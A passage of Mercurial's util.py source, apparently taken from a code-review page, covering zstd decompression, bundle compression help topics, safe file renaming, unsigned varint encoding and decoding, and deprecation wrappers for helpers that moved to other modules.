            insize = len(data)

            try:
                # This was measured to be faster than other streaming
                # decompressors.
                dobj = self._dctx.decompressobj()
                chunks = []
                pos = 0
                while pos < insize:
                    pos2 = pos + self._decompinsize
                    chunk = dobj.decompress(data[pos:pos2])
                    if chunk:
                        chunks.append(chunk)
                    pos = pos2
                # Frame should be exhausted, so no finish() API.

                return ''.join(chunks)
            except Exception as e:
                raise error.RevlogError(_('revlog decompress error: %s') %
                                        stringutil.forcebytestr(e))

    def revlogcompressor(self, opts=None):
        opts = opts or {}
        return self.zstdrevlogcompressor(self._module,
                                         level=opts.get('level', 3))
3915
3916
# Make the zstd engine available through the global registry. The engine
# reports itself unavailable if the zstd module cannot be imported.
compengines.register(_zstdengine())
3917
3918
def bundlecompressiontopics():
    """Obtains a list of available bundle compressions for use in help."""
    # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
    items = {}

    # The docstring needs formatting, so hang the formatted text off a
    # throwaway type instead of mutating the engine's own function.
    class docobject(object):
        pass

    for name in compengines:
        engine = compengines[name]
        if not engine.available():
            continue

        bundleinfo = engine.bundletype()
        # Engines without a bundle spec name do not appear in help.
        if not bundleinfo or not bundleinfo[0]:
            continue

        formatted = pycompat.sysstr('``%s``\n    %s') % (
            bundleinfo[0], engine.bundletype.__doc__)

        entry = docobject()
        entry.__doc__ = formatted
        entry._origdoc = engine.bundletype.__doc__
        entry._origfunc = engine.bundletype
        items[bundleinfo[0]] = entry

    return items
3949
3950
# NOTE(review): presumably collected so the bundletype docstrings are picked
# up for translation — confirm against the i18n tooling.
i18nfunctions = bundlecompressiontopics().values()

# convenient shortcut
dst = debugstacktrace
3954
3955
def safename(f, tag, ctx, others=None):
    """
    Generate a name that it is safe to rename f to in the given context.

    f: filename to rename
    tag: a string tag that will be included in the new name
    ctx: a context, in which the new name must not exist
    others: a set of other filenames that the new name must not be in

    Returns a file name of the form oldname~tag[~number] which does not exist
    in the provided context and is not in the set of other names.
    """
    if others is None:
        others = set()

    def _isfree(name):
        # A candidate is usable when it collides with neither the context
        # nor the caller-supplied reserved names.
        return name not in ctx and name not in others

    candidate = '%s~%s' % (f, tag)
    if _isfree(candidate):
        return candidate
    # Append an increasing numeric suffix until a free name turns up.
    for suffix in itertools.count(1):
        candidate = '%s~%s~%s' % (f, tag, suffix)
        if _isfree(candidate):
            return candidate
3977
3978
def readexactly(stream, n):
    """Read exactly ``n`` bytes from ``stream.read``.

    Raises ``error.Abort`` when the stream is exhausted before ``n`` bytes
    could be obtained.
    """
    data = stream.read(n)
    if len(data) >= n:
        return data
    raise error.Abort(_("stream ended unexpectedly"
                        " (got %d bytes, expected %d)")
                      % (len(data), n))
3986
3987
def uvarintencode(value):
    """Encode an unsigned integer value to a varint.

    A varint is a variable length integer of 1 or more bytes. Each byte
    except the last has the most significant bit set. The lower 7 bits of
    each byte store the 2's complement representation, least significant group
    first.

    >>> uvarintencode(0)
    '\\x00'
    >>> uvarintencode(1)
    '\\x01'
    >>> uvarintencode(127)
    '\\x7f'
    >>> uvarintencode(1337)
    '\\xb9\\n'
    >>> uvarintencode(65536)
    '\\x80\\x80\\x04'
    >>> uvarintencode(-1)
    Traceback (most recent call last):
        ...
    ProgrammingError: negative value for uvarint: -1
    """
    if value < 0:
        raise error.ProgrammingError('negative value for uvarint: %d'
                                     % value)
    # Peel off 7 bits at a time, least significant group first. Continuation
    # bytes carry the high bit (0x80); the final byte leaves it clear.
    # (Renamed the accumulator from ``bytes``, which shadowed the builtin.)
    bits = value & 0x7f
    value >>= 7
    buf = []
    while value:
        buf.append(pycompat.bytechr(0x80 | bits))
        bits = value & 0x7f
        value >>= 7
    buf.append(pycompat.bytechr(bits))

    return ''.join(buf)
4023
4024
def uvarintdecodestream(fh):
    """Decode an unsigned variable length integer from a stream.

    The passed argument is anything that has a ``.read(N)`` method.

    >>> try:
    ...     from StringIO import StringIO as BytesIO
    ... except ImportError:
    ...     from io import BytesIO
    >>> uvarintdecodestream(BytesIO(b'\\x00'))
    0
    >>> uvarintdecodestream(BytesIO(b'\\x01'))
    1
    >>> uvarintdecodestream(BytesIO(b'\\x7f'))
    127
    >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
    1337
    >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
    65536
    >>> uvarintdecodestream(BytesIO(b'\\x80'))
    Traceback (most recent call last):
        ...
    Abort: stream ended unexpectedly (got 0 bytes, expected 1)
    """
    # Each byte carries 7 payload bits; the high bit flags continuation.
    # readexactly() aborts for us if the stream ends mid-varint.
    value = 0
    for shift in itertools.count(0, 7):
        octet = ord(readexactly(fh, 1))
        value |= (octet & 0x7f) << shift
        if not (octet & 0x80):
            return value
4056
4057
4057 ###
4058 ###
4058 # Deprecation warnings for util.py splitting
4059 # Deprecation warnings for util.py splitting
4059 ###
4060 ###
4060
4061
def _deprecatedfunc(func, version):
    """Wrap ``func`` so every call emits a deprecation warning.

    The warning points callers at the function's new home (its defining
    module with the ``mercurial.`` prefix stripped) and names ``version``
    as the release that deprecated the ``util`` alias.
    """
    def call(*args, **kwargs):
        funcname = pycompat.sysbytes(func.__name__)
        modname = pycompat.sysbytes(func.__module__)[len('mercurial.'):]
        msg = "'util.%s' is deprecated, use '%s.%s'" % (funcname, modname,
                                                        funcname)
        nouideprecwarn(msg, version)
        return func(*args, **kwargs)
    call.__name__ = func.__name__
    return call
4070
4071
# Backwards-compatibility aliases for helpers that moved out of util.py.
# The two format tables are re-exported directly; each function is wrapped
# by _deprecatedfunc so callers get a warning naming the new location.

# Date helpers now living in the dateutil module.
defaultdateformats = dateutil.defaultdateformats
extendeddateformats = dateutil.extendeddateformats
makedate = _deprecatedfunc(dateutil.makedate, '4.6')
datestr = _deprecatedfunc(dateutil.datestr, '4.6')
shortdate = _deprecatedfunc(dateutil.shortdate, '4.6')
parsetimezone = _deprecatedfunc(dateutil.parsetimezone, '4.6')
strdate = _deprecatedfunc(dateutil.strdate, '4.6')
parsedate = _deprecatedfunc(dateutil.parsedate, '4.6')
matchdate = _deprecatedfunc(dateutil.matchdate, '4.6')

# String helpers now living in the stringutil module.
escapedata = _deprecatedfunc(stringutil.escapedata, '4.6')
binary = _deprecatedfunc(stringutil.binary, '4.6')
stringmatcher = _deprecatedfunc(stringutil.stringmatcher, '4.6')
shortuser = _deprecatedfunc(stringutil.shortuser, '4.6')
emailuser = _deprecatedfunc(stringutil.emailuser, '4.6')
email = _deprecatedfunc(stringutil.email, '4.6')
ellipsis = _deprecatedfunc(stringutil.ellipsis, '4.6')
escapestr = _deprecatedfunc(stringutil.escapestr, '4.6')
unescapestr = _deprecatedfunc(stringutil.unescapestr, '4.6')
forcebytestr = _deprecatedfunc(stringutil.forcebytestr, '4.6')
uirepr = _deprecatedfunc(stringutil.uirepr, '4.6')
wrap = _deprecatedfunc(stringutil.wrap, '4.6')
parsebool = _deprecatedfunc(stringutil.parsebool, '4.6')
General Comments 0
You need to be logged in to leave comments. Login now